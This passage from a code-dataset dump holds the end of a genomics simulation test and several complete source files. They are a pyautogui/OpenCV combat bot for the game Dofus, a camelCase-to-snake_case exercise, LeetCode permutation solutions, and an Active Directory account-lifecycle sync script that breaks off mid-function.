0.6, 0.6, 0.6, 0.6],\n ),\n ],\n)\ndef test_pen_table_model(\n eff1, eff2, baseline, diff, main1, main2, interaction, expected\n):\n \"\"\"Test calculation of final penetrance table from a model\"\"\"\n model = BAMS.from_model(\n eff1=eff1,\n eff2=eff2,\n penetrance_base=baseline,\n penetrance_diff=diff,\n main1=main1,\n main2=main2,\n interaction=interaction,\n )\n assert np.isclose(\n model.pen_table, np.reshape(np.array(expected), newshape=(3, 3))\n ).all()\n\n\ndef test_random_seed():\n test_sim = BAMS.from_model(\n SNPEffectEncodings.RECESSIVE,\n SNPEffectEncodings.RECESSIVE,\n main1=1,\n main2=1,\n interaction=1,\n random_seed=123,\n )\n\n # Test simulating data using random seeds\n original_cc_sim = test_sim.generate_case_control(snr=0.1)\n original_quant_sim = test_sim.generate_quantitative(snr=0.1)\n repeat_cc_sim = test_sim.generate_case_control(snr=0.1)\n repeat_quant_sim = test_sim.generate_quantitative(snr=0.1)\n test_sim.set_random_seed(456)\n newseed_cc_sim = test_sim.generate_case_control(snr=0.1)\n newseed_quant_sim = test_sim.generate_quantitative(snr=0.1)\n test_sim.set_random_seed(123)\n redo_cc_sim = test_sim.generate_case_control(snr=0.1)\n redo_quant_sim = test_sim.generate_quantitative(snr=0.1)\n\n # Subsequent runs are different\n assert_frame_not_equal(original_cc_sim, repeat_cc_sim)\n assert_frame_not_equal(original_quant_sim, repeat_quant_sim)\n\n # New seed should be different\n assert_frame_not_equal(original_cc_sim, newseed_cc_sim)\n assert_frame_not_equal(original_quant_sim, newseed_quant_sim)\n\n # Resetting seed should match original\n assert_frame_equal(original_cc_sim, redo_cc_sim)\n assert_frame_equal(original_quant_sim, redo_quant_sim)\n\n\ndef test_null():\n bas = BAMS(PenetranceTables.NULL)\n simulated = bas.generate_case_control(10000, 1000, 0.1, 0.1)\n # maf should be similar to the specified one despite a large fraction of cases\n # specifically assert it is within 5%\n assert abs(0.1 - simulated[\"SNP1\"].genomics.maf) / 0.1 < 0.05\n","repo_name":"HallLab/pandas-genomics","sub_path":"tests/simulation/test_biallelic_sim.py","file_name":"test_biallelic_sim.py","file_ext":"py","file_size_in_byte":5297,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"32"}
+{"seq_id":"8626666688","text":"import pyautogui\nimport cv2\nimport numpy as np\nimport time\nfrom Divers import Divers as divers\nimport random\nimport copy\n\ndef combat_fini():\n template = cv2.imread('Picture/fermer_combat.png', 0)\n template_BW = cv2.threshold(template, 100, 255, cv2.THRESH_BINARY)[1]\n image = pyautogui.screenshot(region=(571, 416, 90, 230))\n # image.show()\n img_rgb = cv2.cvtColor(np.array(image), cv2.COLOR_RGB2BGR)\n img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)\n img_BW = cv2.threshold(img_gray, 100, 255, cv2.THRESH_BINARY)[1]\n res2 = cv2.matchTemplate(img_BW, template_BW, cv2.TM_SQDIFF_NORMED)\n threshold = 0.1\n\n # Store the coordinates of matched area in a numpy array\n if np.any(res2 <= threshold):\n position = np.where(res2 <= threshold)\n result = (1, position[1][0]+571, position[0][0]+416)\n else:\n result = (0, 20, 20)\n return result\n\n\ndef click_combat_fini(pause=[False]):\n bool_fini = combat_fini()\n if bool_fini[0] == 1:\n divers.move_mouse(bool_fini[1], bool_fini[2], 60, 10, alea=False, pause=pause)\n\n\ndef findperso(color1, color2, color3, dist=10, tol=4):\n now = pyautogui.screenshot\n pos_nope = []\n while True:\n pos1 = divers.findcolor(color1, sauf=pos_nope, tol=tol)\n # print(pos1)\n # print(pos_nope)\n if pos1:\n if divers.findcolor(color2, initial=(pos1[0]-dist, pos1[1]-dist), final=(pos1[0]+dist, pos1[1]+dist), tol=tol):\n return pos1\n if divers.findcolor(color3, initial=(pos1[0]-dist, pos1[1]-dist), final=(pos1[0]+dist, pos1[1]+dist), tol=tol):\n return pos1\n pos_nope.append((pos1[0]-dist, pos1[1]-dist, pos1[0]+dist, pos1[1]+dist))\n else:\n break\n pos_nope = []\n while True:\n pos1 = divers.findcolor(color2, sauf=pos_nope, tol=tol)\n if pos1:\n if divers.findcolor(color3, initial=(pos1[0]-dist, pos1[1]-dist), final=(pos1[0]+dist, pos1[1]+dist), tol=tol):\n return pos1\n pos_nope.append((pos1[0]-dist, pos1[1]-dist, pos1[0]+dist, pos1[1]+dist))\n else:\n break\n return None\n\n\ndef obstacle(origine):\n dX = 2\n dY = 2\n color = (34, 51, 153)\n tol = 2\n\n color = np.uint8([[[color[0], color[1], color[2] ]]])\n hsv_color = cv2.cvtColor(color, cv2.COLOR_RGB2HSV)\n\n lower_limit = np.array([hsv_color[0][0][0]-tol, hsv_color[0][0][1]-tol, hsv_color[0][0][2]-tol])\n upper_limit = np.array([hsv_color[0][0][0]+tol, hsv_color[0][0][1]+tol, hsv_color[0][0][2]+tol])\n\n frame = pyautogui.screenshot()\n hsv = cv2.cvtColor(np.array(frame), cv2.COLOR_RGB2HSV)\n mask = cv2.inRange(hsv, lower_limit, upper_limit)\n\n height, width = mask.shape\n U = (28.2, 14)\n V = (28.2, -14)\n porte = 11\n obstacle_dico = {}\n for i in range(-porte, porte+1):\n porte2 = porte - abs(i)\n for j in range(-porte2, porte2 + 1):\n actuel = (np.int64(origine[0] + i * U[0] + j*V[0]), np.int64(origine[1] + i * U[1] + j*V[1]))\n zone_chercher = np.zeros((height, width, 1), np.uint8)\n initial = (actuel[0] - dX, actuel[1] - dY)\n final = (actuel[0] + dX, actuel[1] + dY)\n # print(initial,final)\n cv2.rectangle(zone_chercher, initial, final, (255), -1)\n res = cv2.bitwise_and(zone_chercher, zone_chercher, mask=mask)\n result1, result2 = np.where(res == 255)\n if(len(result1)):\n obstacle_dico[(i, j)] = True\n # else:\n # obstacle_dico[(i,j)] = False\n return obstacle_dico\n # frame2 = cv2.cvtColor(np.array(frame), cv2.COLOR_RGB2BGR)\n # for i in obstacle_dico.keys():\n # if obstacle_dico[i]:\n # actuel = (np.int64(origine[0] + i[0] * U[0] + i[1]*V[0]), np.int64(origine[1] + i[0] * U[1] + i[1]*V[1]))\n # cv2.rectangle(frame2,(actuel[0] - 2,actuel[1] - 2),(actuel[0] + 2,actuel[1] + 2),(255,255,255),-1)\n #\n # cv2.imshow('frame',frame2)\n # k = cv2.waitKey()\n\n\ndef findpath(obstacleexterne, pos, but):\n try:\n obstacle_dico = copy.deepcopy(obstacleexterne)\n obstacle_dico[but] = True\n libre = list(obstacle_dico.keys())\n if pos in libre:\n libre.remove(pos)\n list_pos_actuelle = [pos]\n list_pos_nouvelle = []\n dico_pos = {pos: 0}\n accessible = []\n for i in range(1, 31):\n for j in list_pos_actuelle:\n for k in voisin(j):\n if k in libre:\n libre.remove(k)\n dico_pos[k] = i\n list_pos_nouvelle.append(k)\n accessible.append(k)\n if not (but in libre):\n break\n list_pos_actuelle = list_pos_nouvelle\n list_pos_nouvelle = []\n\n pos_actuelle = but\n path = []\n if not (but in accessible):\n dist_min = 1000\n for i in accessible:\n if (abs(but[0]-i[0]) + abs(but[1]-i[1])) < dist_min:\n dist_min = (abs(but[0]-i[0]) + abs(but[1]-i[1]))\n pos_actuelle = i\n\n for i in range(dico_pos[pos_actuelle]-1, 0, -1):\n for j in voisin(pos_actuelle):\n try:\n if dico_pos[j] == i:\n path.append(j)\n pos_actuelle = j\n break\n except:\n continue\n return path\n except:\n path = []\n\n\ndef voisin(pos):\n return [(pos[0]+1, pos[1]), (pos[0]-1, pos[1]), (pos[0], pos[1]+1), (pos[0], pos[1]-1)]\n\ndef ligne_de_vue(obstacle, pos,but):\n try:\n obstacle_dico = copy.deepcopy(obstacle)\n obstacle_dico[pos] = True\n obstacle_dico[but] = True\n dist = abs(but[1]-pos[1]) + abs(but[0]-pos[0])\n if (but[0]-pos[0]) == 0:\n dX = np.arange(0, but[1]-pos[1], ((but[1]-pos[1])/dist))\n pente = (but[0]-pos[0])/(but[1]-pos[1])\n X = np.arange(pos[1], but[1], ((but[1]-pos[1])/dist))\n else:\n dX = np.arange(0, but[0]-pos[0], ((but[0]-pos[0])/dist))\n pente = (but[1]-pos[1])/(but[0]-pos[0])\n X = np.arange(pos[0], but[0], ((but[0]-pos[0])/dist))\n Y = []\n for i in dX:\n Y.append(pente*i + pos[1])\n\n # print(X)\n # print(Y)\n for i in range(len(X)):\n try:\n if (but[0]-pos[0]) == 0:\n obstacle_dico[(round(Y[i]), round(X[i]))]\n else:\n obstacle_dico[(round(X[i]), round(Y[i]))]\n except:\n return False\n return True\n except:\n return False\n\n\ndef pos_abs_2_rel(pos, origine):\n # U = (36.3, 18.1)\n # V = (36.3,-18.1)\n dX = 28.2\n dY = 14\n\n X = round((pos[0] - origine[0])/dX)\n Y = round((pos[1] - origine[1])/dY)\n\n a = (X + Y)/2\n b = X - a\n return (a,b)\n\ndef pos_rel_2_abs(pos, origine):\n U = (28.2, 14)\n V = (28.2, -14)\n pos_abs = (np.int64(origine[0] + pos[0] * U[0] + pos[1] * V[0]), np.int64(origine[1] + pos[0] * U[1] + pos[1] * V[1]))\n return pos_abs\n\ndef modeTacticCreature(pause= [False]):\n if(divers.findcolor((173, 173, 173),(872, 686),(879, 693))):\n divers.move_mouse(872, 686,6,7, vitesse=1.5, pause= pause)\n time.sleep(0.8 + random.random() * 0.5)\n\n if(divers.findcolor((173, 173, 173),(891, 686),(897, 693))):\n divers.move_mouse(891,686,6,7, vitesse=1.5, pause= pause)\n time.sleep(0.8 + random.random() * 0.5)\n return\n\ndef combat(option, pause= [False]):\n try:\n ColorNextTurn = (213, 243, 0)\n #cra = [(253, 190, 45),(216, 138, 22),(119, 74, 2)]#Couleur Enutrof\n cra = [(253, 57, 36), (196, 19, 0), (101, 11, 1)]#Couleur Cra\n creature = [(77, 77, 93), (46, 54, 61), (126, 126, 142)]\n Sort_Sans_Vue = (595, 667)\n Sort_Avec_Vue = (621, 667)\n PO_Sort = option.po\n pm = option.pm\n\n pos_ennemi = (0, 0)\n obst = {}\n if divers.findcolor(ColorNextTurn, (882, 646), (949, 669)):\n bool_fini = (1, 570, 433)\n modeTacticCreature()\n ColorEndFight = (191, 230, 0)\n pos_perso = findperso(cra[0], cra[1], cra[2])\n if (pos_perso == None):\n pos_perso = findperso(cra[0], cra[1], cra[2])\n origine = (pos_perso[0]+2, pos_perso[1]+15)\n\n while(True):\n modeTacticCreature()\n #lance le combat au premier tour et ensuite passe son tour\n for i in range(0, 20):\n time.sleep(0.3)\n if divers.findcolor(ColorNextTurn, (882, 646), (949, 669)):\n break\n if combat_fini()[0] == 1:\n i = 19\n bool_fini = combat_fini()\n break\n if ((i+1) % 10) == 0:\n divers.move_mouse(262, 694, 100, 4, alea=False, pause=pause)\n if i == 19:\n break\n\n divers.move_mouse(882, 646, 65, 20, alea=False, pause=pause)\n divers.move_mouse(1083, 388, 150, 160, alea=False, pause=pause)\n\n #attend son tour de jeu\n for i in range(0, 50):\n time.sleep(0.3)\n if divers.findcolor(ColorNextTurn, (882, 646), (949, 669)):\n break\n if combat_fini()[0] == 1:\n i = 49\n bool_fini = combat_fini()\n break\n if ((i + 1) % 15) == 0:\n divers.move_mouse(262, 694, 100, 4, alea=False, pause=pause)\n if i == 49:\n break\n\n #Click sort sans ligne de vue\n bool_sort = False\n if not(pos_ennemi in list(obst.keys())):\n bool_sort = True\n divers.move_mouse(Sort_Sans_Vue[0], Sort_Sans_Vue[1], 13, 14, vitesse=2, alea=False, pause=pause)\n divers.move_mouse(72, 146, 130, 450, Click=0, vitesse=3, alea=False, pause=pause)\n obst = obstacle(origine)\n # divers.move_mouse(70, 475, 100, 230, vitesse = 2, pause= pause)\n\n pos_perso = findperso(cra[0], cra[1], cra[2])\n if pos_perso == None:\n pos_perso = findperso(cra[0], cra[1], cra[2])\n\n pos_ennemi = findperso(creature[0], creature[1], creature[2])\n if pos_ennemi == None:\n pos_ennemi = findperso(creature[0], creature[1], creature[2])\n if pos_ennemi == None:\n break\n pos_perso = (pos_perso[0]+2, pos_perso[1] + 19)\n pos_ennemi = (pos_ennemi[0]+2, pos_ennemi[1] + 19)\n pos_perso = pos_abs_2_rel(pos_perso, origine)\n pos_ennemi = pos_abs_2_rel(pos_ennemi, origine)\n\n dist = abs(pos_perso[0]-pos_ennemi[0]) + abs(pos_perso[1]-pos_ennemi[1])\n # if too far, get closer\n if dist > PO_Sort:\n # enleve click sort pour bouger\n if bool_sort:\n bool_sort = False\n divers.move_mouse(72, 146, 130, 450, vitesse=2, pause= pause)\n path = findpath(obst, pos_perso, pos_ennemi)\n if len(path) < pm:\n pm = len(path)\n Go_to = pos_rel_2_abs(path[len(path)-pm], origine)\n divers.move_mouse(Go_to[0]-6, Go_to[1]-4, 6, 6, vitesse=2, pause=pause)\n pos_perso = path[len(path)-5]\n dist = abs(pos_perso[0]-pos_ennemi[0]) + abs(pos_perso[1]-pos_ennemi[1])\n\n if dist <= PO_Sort:\n if ligne_de_vue(obst, pos_perso, pos_ennemi):\n Go_to = pos_rel_2_abs(pos_ennemi, origine)\n\n divers.move_mouse(Sort_Avec_Vue[0], Sort_Avec_Vue[1], 13, 14, alea=False, vitesse=2, pause=pause)\n divers.move_mouse(Go_to[0]-6, Go_to[1]-4, 9, 6, alea=False, vitesse=2, pause=pause)\n\n time.sleep(0.3 + random.random() * 0.3)\n if combat_fini()[0] == 1:\n bool_fini = combat_fini()\n break\n\n divers.move_mouse(Sort_Avec_Vue[0], Sort_Avec_Vue[1], 13, 14, alea=False, vitesse=2, pause=pause)\n if combat_fini()[0] == 1:\n bool_fini = combat_fini()\n break\n divers.move_mouse(Go_to[0]-6, Go_to[1]-4, 9, 6, vitesse=2, pause= pause)\n # Sort à ligne de vue\n # 2e sort à ligne de vue\n else:\n Go_to = pos_rel_2_abs(pos_ennemi,origine)\n if (not(bool_sort)):\n divers.move_mouse(Sort_Sans_Vue[0], Sort_Sans_Vue[1], 13, 14,alea=False, vitesse=2, pause= pause)\n divers.move_mouse(Go_to[0]-6, Go_to[1]-4, 9, 6, alea=False, vitesse=2, pause=pause)\n\n time.sleep(0.3 + random.random() * 0.3)\n if combat_fini()[0] == 1:\n bool_fini = combat_fini()\n break\n\n divers.move_mouse(Sort_Sans_Vue[0], Sort_Sans_Vue[1], 13, 14, alea=False, vitesse=2, pause=pause)\n if combat_fini()[0] == 1:\n bool_fini = combat_fini()\n break\n divers.move_mouse(Go_to[0]-6, Go_to[1]-4, 9, 6, vitesse=2, pause=pause)\n\n time.sleep(0.3 + random.random() * 0.3)\n divers.move_mouse(bool_fini[1], bool_fini[2], 60, 10, alea=False, pause=pause)\n except:\n return\n\n","repo_name":"bebeh3176/Farming_sim","sub_path":"BOT_Dofus/Divers/Combat.py","file_name":"Combat.py","file_ext":"py","file_size_in_byte":14065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"34621481689","text":"# prompts the user for the name of a variable in camel case\ncamel_text = input(\"camelCase: \").strip()\n\n# assign the first char of the camel case\nsnake_text = camel_text[0]\n\n# check the first letter in input\nfor char in camel_text[1:]:\n # check if first letter is upper\n if char.isupper():\n # add \"_\" at the beginning of the uppercase char then make it lowercase\n snake_text += \"_\" + char.lower()\n else:\n snake_text += char.lower()\n# outputs the corresponding name in snake case.\nprint(f\"snake_case: {snake_text}\")","repo_name":"patricktenorio/CS50P_complete_course","sub_path":"week_2/camel/camel.py","file_name":"camel.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"7699722188","text":"from collections import deque\n\nclass Solution:\n def permute(self, nums: List[int]) -> List[List[int]]:\n \n # []\n # [1]\n # [1,2], [2,1]\n # [3,1,2], [1,3,2], [1,2,3], [3,2,1], [2,3,1], [2,1,3]\n \n res = [] # [3,2,1], [2,3,1], [2,1,3]\n que = deque([])\n que += [],\n \n for num in nums: #3\n n = len(que) # 2, [2,1] [1,2]\n for _ in range(n): # 2\n oldPerm = que.popleft() # [2,1]\n for i in range(len(oldPerm)+1): # 0,1,2\n newPerm = oldPerm[:] # [2,1]\n newPerm.insert(i, num) # \n if len(newPerm) == len(nums):\n res += newPerm,\n else:\n que += newPerm, # []\n \n return res\n\n# Second attempt\n\nfrom collections import deque\n\nclass Solution:\n def permute(self, nums: List[int]) -> List[List[int]]:\n # use bit manipulation\n # use bfs method \n \n # BFS method\n # when len == 3: add to res\n # [] -> [1] -> [2,1] [1,2] -> [3,2,1], [2,3,1], [2,1,3], [3,1,2], [1,3,2], [1,2,3]\n \n que = deque([[]])\n res = []\n idx = 0\n while len(que):\n # print(que)\n for x in range(len(que)): # 1\n temp = que.popleft() # [1]\n # print(\"temp\", temp)\n if len(temp) == len(nums):\n res += temp,\n break\n\n for i in range(len(temp)+1): # 2\n newList = temp[:i] + [nums[idx]] + temp[i:]\n # print(newList)\n que += newList,\n\n idx+=1\n \n return res","repo_name":"DarshanGowda0/LC-Grind","sub_path":"Daily-Grind/56.py","file_name":"56.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"27192554420","text":"import logging\nimport typing\nimport uuid\nfrom functools import lru_cache\nfrom functools import partial\nfrom functools import wraps\nfrom operator import itemgetter\nfrom typing import Any\nfrom typing import Callable\nfrom typing import Dict\nfrom typing import Iterator\nfrom typing import List\nfrom typing import Optional\nfrom typing import Tuple\n\nimport click\nimport sentry_sdk\nfrom ra_utils.apply import apply\nfrom ra_utils.catchtime import catchtime\nfrom ra_utils.jinja_filter import create_filters\nfrom ra_utils.lazy_dict import LazyDict\nfrom ra_utils.lazy_dict import LazyEval\nfrom ra_utils.lazy_dict import LazyEvalBare\nfrom ra_utils.load_settings import load_settings\nfrom ra_utils.tqdm_wrapper import tqdm\n\nfrom .ad_exceptions import NoActiveEngagementsException\nfrom .ad_exceptions import NoPrimaryEngagementException\nfrom .ad_logger import start_logging\nfrom .ad_reader import ADParameterReader\nfrom .ad_writer import ADWriter\nfrom .read_ad_conf_settings import injected_settings\nfrom exporters.sql_export.gql_lora_cache_async import GQLLoraCache\nfrom exporters.sql_export.lora_cache import get_cache as LoraCache\nfrom exporters.sql_export.old_lora_cache import OldLoraCache\n\nlogger = logging.getLogger(\"CreateAdUsers\")\nexport_logger = logging.getLogger(\"export\")\n\nFilterFunction = Callable[[Tuple[Dict, Dict]], bool]\n\n\nclass AdLifeCycle:\n def __init__(\n self, read_from_cache: bool = True, skip_occupied_names_check: bool = False\n ) -> None:\n logger.info(\"AD Sync Started\")\n self._settings = self._load_settings()\n\n self.roots = self._settings[\"integrations.ad.write.create_user_trees\"]\n\n self.stats = self._gen_stats()\n\n self.create_filters = self._load_jinja_filters(\"create_filters\")\n self.disable_filters = self._load_jinja_filters(\"disable_filters\")\n\n self.ad_reader = self._get_adreader()\n\n # This is a potentially slow step (since it may read LoraCache)\n print(\"Retrive LoRa dump\")\n with catchtime() as t:\n self.lc, self.lc_historic = self._update_lora_cache(dry_run=read_from_cache)\n print(\"Done with LoRa caching: {}\".format(t()))\n\n # Create a set of users with engagements for faster filtering\n engagements = self.lc_historic.engagements.values()\n self.users_with_engagements = set(map(lambda eng: eng[0][\"user\"], engagements))\n\n print(\"Retrieve AD Writer name list\")\n with catchtime() as t:\n self.ad_writer = self._get_adwriter(\n lc=self.lc,\n lc_historic=self.lc_historic,\n skip_occupied_names=skip_occupied_names_check,\n all_settings=injected_settings(\"ad_lifecycle_injected_settings\"),\n )\n print(\"Done with AD Writer init: {}\".format(t()))\n\n logger.debug(\"__init__() done\")\n\n def _load_settings(self):\n return load_settings()\n\n def _load_jinja_filters(self, source: str) -> List[Callable]:\n seeded_create_filters = partial(\n create_filters, tuple_keys=(\"employee\", \"ad_object\")\n )\n setting_name = f\"integrations.ad.lifecycle.{source}\"\n filter_templates = self._settings.get(setting_name, [])\n return [\n # Decorate each `filter_func` so it will log skipped users under\n # a name such as \"create_filters_num_0\", etc.\n self.log_skipped(f\"{source}_num_{num}\")(filter_func)\n for num, filter_func in enumerate(seeded_create_filters(filter_templates))\n ]\n\n def _get_adreader(self):\n reader = ADParameterReader()\n reader.cache_all(print_progress=True)\n return reader\n\n def _get_adwriter(self, **kwargs):\n return ADWriter(**kwargs)\n\n def log_skipped(self, filtername):\n \"\"\"Return decorated version of a filter function taking a single\n `tup` arg, which is an `(employee, ad_object)` tuple.\n If the filter function returns `False`, store the result in the\n `stats[\"skipped\"][filtername]` dictionary by the employee UUID.\n \"\"\"\n\n def get_employee_name(employee):\n if \"name\" in employee:\n return \" \".join(employee[\"name\"])\n elif \"navn\" in employee:\n return employee[\"navn\"]\n else:\n return \"unknown\"\n\n def decorator(f):\n @wraps(f)\n def wrapper(tup):\n # Call the filter function saving its status\n status = f(tup)\n if status is False:\n skipped = self.stats.setdefault(\"skipped\", {})\n users = skipped.setdefault(filtername, {})\n # Add user UUID to dictionary (name is used for the value)\n employee = tup[0]\n users[employee[\"uuid\"]] = get_employee_name(employee)\n return status\n\n return wrapper\n\n return decorator\n\n def _update_lora_cache(\n self, dry_run: bool = True\n ) -> Tuple[\n typing.Union[OldLoraCache, GQLLoraCache],\n typing.Union[OldLoraCache, GQLLoraCache],\n ]:\n \"\"\"\n Read all information from AD and LoRa.\n :param dry_run: If True, LoRa dump will be read from cache.\n \"\"\"\n lc = LoraCache(resolve_dar=True, full_history=False)\n lc.populate_cache(dry_run=dry_run, skip_associations=True)\n lc.calculate_derived_unit_data()\n lc.calculate_primary_engagements()\n\n lc_historic = LoraCache(resolve_dar=True, full_history=True, skip_past=True)\n lc_historic.populate_cache(dry_run=dry_run, skip_associations=True)\n\n return lc, lc_historic\n\n def _gen_stats(self) -> Dict[str, Any]:\n return {\n \"critical_errors\": 0,\n \"engagement_not_found\": 0,\n \"created_users\": 0,\n \"disabled_users\": 0,\n \"already_in_ad\": 0,\n \"no_active_engagements\": 0,\n \"not_in_user_tree\": 0,\n \"create_filtered\": 0,\n \"users\": set(),\n }\n\n @apply\n def _find_user_unit_tree(self, user: dict, ad_object: dict) -> bool:\n try:\n (\n employment_number,\n title,\n eng_org_unit_uuid,\n eng_uuid,\n ) = self.ad_writer.datasource.find_primary_engagement(user[\"uuid\"])\n except (NoActiveEngagementsException, NoPrimaryEngagementException):\n logger.warning(\n \"Warning: Unable to find primary for {}!\".format(user[\"uuid\"])\n )\n return False\n\n logger.debug(\"Primary found, now find org unit location\")\n\n try:\n unit = self.lc.units[eng_org_unit_uuid][0]\n except KeyError:\n logger.warning(\n \"cannot find unit %r (user=%r)\", eng_org_unit_uuid, user[\"uuid\"]\n )\n return False\n\n # Walk up the organisation unit tree, starting at `unit[\"parent\"]`.\n # Stop when we find an allowed root node, or if we encounter a node\n # without a parent (must be root?)\n looking = True\n while looking:\n if unit[\"uuid\"] in self.roots:\n return True\n if unit[\"parent\"] is None:\n return False\n\n if unit[\"parent\"] in self.lc.units:\n unit = self.lc.units[unit[\"parent\"]][0]\n else:\n logger.warning(\n \"cannot find parent unit %r (user=%r)\", unit[\"parent\"], user[\"uuid\"]\n )\n looking = False\n\n return False\n\n def _get_filter_users_outside_unit_tree(self):\n \"\"\"Return predicate which filter MO users outside the specified unit tree (aka.\n \"user_trees\".)\n \"\"\"\n\n @self.log_skipped(\"filter_users_outside_unit_tree\")\n def filter_users_outside_unit_tree(tup):\n status = self._find_user_unit_tree(tup)\n if status is False:\n self.stats[\"not_in_user_tree\"] += 1\n return status\n\n return filter_users_outside_unit_tree\n\n def _gen_filtered_employees(\n self, in_filters: Optional[List[FilterFunction]] = None\n ):\n def enrich_with_ad_user(mo_employee: dict) -> Tuple[Dict, Dict]:\n \"\"\"Enrich mo_employee with AD employee dictionary.\"\"\"\n cpr = mo_employee[\"cpr\"]\n ad_object = self.ad_reader.read_user(cpr=cpr, cache_only=True)\n return mo_employee, ad_object\n\n @lru_cache(maxsize=0)\n def get_engagements() -> List[LazyDict]:\n \"\"\"Produce a list of engagements with lazily evaluated properties.\"\"\"\n\n def make_class_lazy(class_attribute: str, mo_engagement: dict) -> dict:\n \"\"\"Create a lazily evaluated class property.\"\"\"\n class_uuid = mo_engagement[class_attribute]\n mo_engagement[class_attribute + \"_uuid\"] = class_uuid\n mo_engagement[class_attribute] = LazyEvalBare(\n lambda: {\n **self.lc.classes[class_uuid],\n \"uuid\": class_uuid,\n }\n )\n return mo_engagement\n\n lc_engagements: List[\n List[Dict]\n ] = self.lc.engagements.values() # type:ignore\n engagements: Iterator[Dict] = map(itemgetter(0), lc_engagements)\n lazy_engagements: Iterator[LazyDict] = map(LazyDict, engagements)\n enriched_engagements: Iterator[LazyDict] = map(\n # Enrich engagement_type class\n partial(make_class_lazy, \"engagement_type\"),\n map(\n # Enrich primary_type class\n partial(make_class_lazy, \"primary_type\"),\n map(\n # Enrich job_function class\n partial(make_class_lazy, \"job_function\"),\n lazy_engagements,\n ),\n ),\n )\n return list(enriched_engagements)\n\n def enrich_with_engagements(mo_employee: dict) -> LazyDict:\n \"\"\"Enrich mo_employee with lazy engagement information.\n\n The list of engagements is itself lazy, so this code is essentially free\n when it is not in use.\n \"\"\"\n # Turn mo_employee into a lazy dict and add lazy properties\n lazy_employee: LazyDict = LazyDict(mo_employee)\n\n lazy_employee[\"engagements\"] = LazyEvalBare(\n lambda: list(\n filter(\n lambda engagement: engagement[\"user\"] == mo_employee[\"uuid\"],\n get_engagements(),\n )\n )\n )\n\n lazy_employee[\"primary_engagement\"] = LazyEval(\n lambda key, dictionary: next(\n filter(\n lambda engagement: engagement.get(\"primary_boolean\", False),\n dictionary[\"engagements\"],\n ),\n None,\n )\n )\n\n return lazy_employee\n\n filters: List[FilterFunction] = in_filters or []\n\n lc_employees: List[List[Dict]] = self.lc.users.values() # type:ignore\n nonempty_employees = filter(lambda val: len(val) > 0, lc_employees)\n tqdm_employees: List[List[Dict]] = tqdm(nonempty_employees)\n # From employee_effects --> employees\n employees: Iterator[Dict] = map(itemgetter(0), tqdm_employees)\n\n # Enrich with engagements\n ee_employees: Iterator[Dict] = map(enrich_with_engagements, employees)\n\n # Enrich with ad_objects\n ad_employees: Iterator[Tuple[Dict, Dict]] = map(\n enrich_with_ad_user, ee_employees\n )\n\n # Apply requested filters\n for filter_func in filters:\n ad_employees = filter(filter_func, ad_employees)\n return ad_employees\n\n def disable_ad_accounts(self, dry_run: bool = False) -> Dict[str, Any]:\n \"\"\"Iterate over all users and disable non-active AD accounts.\"\"\"\n\n @apply\n def filter_user_not_in_ad(employee: dict, ad_object: dict) -> bool:\n in_ad = bool(ad_object)\n if not in_ad:\n logger.debug(\"User {} does not have an AD account\".format(employee))\n return False\n return True\n\n @apply\n def filter_user_has_engagements(employee: dict, ad_object: dict) -> bool:\n # Check the user does not have a valid engagement:\n # TODO: Consider using the lazy properties for this\n if employee[\"uuid\"] in self.users_with_engagements:\n logger.debug(\"User {} is active - do not touch\".format(employee))\n return False\n return True\n\n employees = self._gen_filtered_employees(\n [\n # Remove users that does not exist in AD\n filter_user_not_in_ad,\n # Remove users that have active engagements\n filter_user_has_engagements,\n # Remove users outside the unit tree\n self._get_filter_users_outside_unit_tree(),\n ]\n + self.disable_filters\n )\n # Employees now contain only employees which should be disabled\n for employee, ad_object in employees:\n logger.debug(\"This user has no active engagemens, we should disable\")\n # This user has an AD account, but no engagements - disable\n sam = ad_object[\"SamAccountName\"]\n status = True\n message = \"dry-run\"\n if not dry_run:\n status, message = self.ad_writer.enable_user(username=sam, enable=False)\n if status:\n logger.debug(\"Disabled: {}\".format(sam))\n self.stats[\"disabled_users\"] += 1\n self.stats[\"users\"].add(employee[\"uuid\"])\n else:\n logger.warning(\"enable_user call failed!\")\n logger.warning(message)\n self.stats[\"critical_errors\"] += 1\n\n return self.stats\n\n def create_ad_accounts(self, dry_run: bool = False) -> Dict[str, Any]:\n \"\"\"Iterate over all users and create missing AD accounts.\"\"\"\n\n @self.log_skipped(\"filter_user_already_in_ad\")\n @apply\n def filter_user_already_in_ad(employee, ad_object):\n in_ad = bool(ad_object)\n if in_ad:\n self.stats[\"already_in_ad\"] += 1\n logger.debug(\"User {} is already in AD\".format(employee))\n return False\n return True\n\n @self.log_skipped(\"filter_user_without_engagements\")\n @apply\n def filter_user_without_engagements(employee, ad_object):\n # TODO: Consider using the lazy properties for this\n if employee[\"uuid\"] not in self.users_with_engagements:\n self.stats[\"no_active_engagements\"] += 1\n logger.debug(\n \"User {} has no active engagements - skip\".format(employee)\n )\n return False\n return True\n\n def run_create_filters(tup):\n status = all(create_filter(tup) for create_filter in self.create_filters)\n if status is False:\n self.stats[\"create_filtered\"] += 1\n return status\n\n employees = self._gen_filtered_employees(\n [\n # Remove users that already exist in AD\n filter_user_already_in_ad,\n # Remove users that have no active engagements at all\n filter_user_without_engagements,\n # Check if the user is in a create-user sub-tree\n self._get_filter_users_outside_unit_tree(),\n # Run all create_filters\n run_create_filters,\n ]\n )\n # Employees now contain only employees which should be created\n for employee, ad_object in employees:\n logger.debug(\"Create account for {}\".format(employee))\n try:\n # Create user without manager to avoid risk of failing\n # if manager is not yet in AD. The manager will be attached\n # by the next round of sync.\n status = True\n message = \"dry-run\"\n status, message = self.ad_writer.create_user(\n employee[\"uuid\"], create_manager=False, dry_run=dry_run\n )\n if status:\n logger.debug(\"New username: {}\".format(message))\n self.stats[\"created_users\"] += 1\n self.stats[\"users\"].add(employee[\"uuid\"])\n else:\n logger.warning(\"create_user call failed!\")\n logger.warning(message)\n self.stats[\"critical_errors\"] += 1\n except NoPrimaryEngagementException:\n logger.exception(\"No engagment found!\")\n self.stats[\"engagement_not_found\"] += 1\n except Exception as e:\n logger.exception(\"Unknown error!\")\n 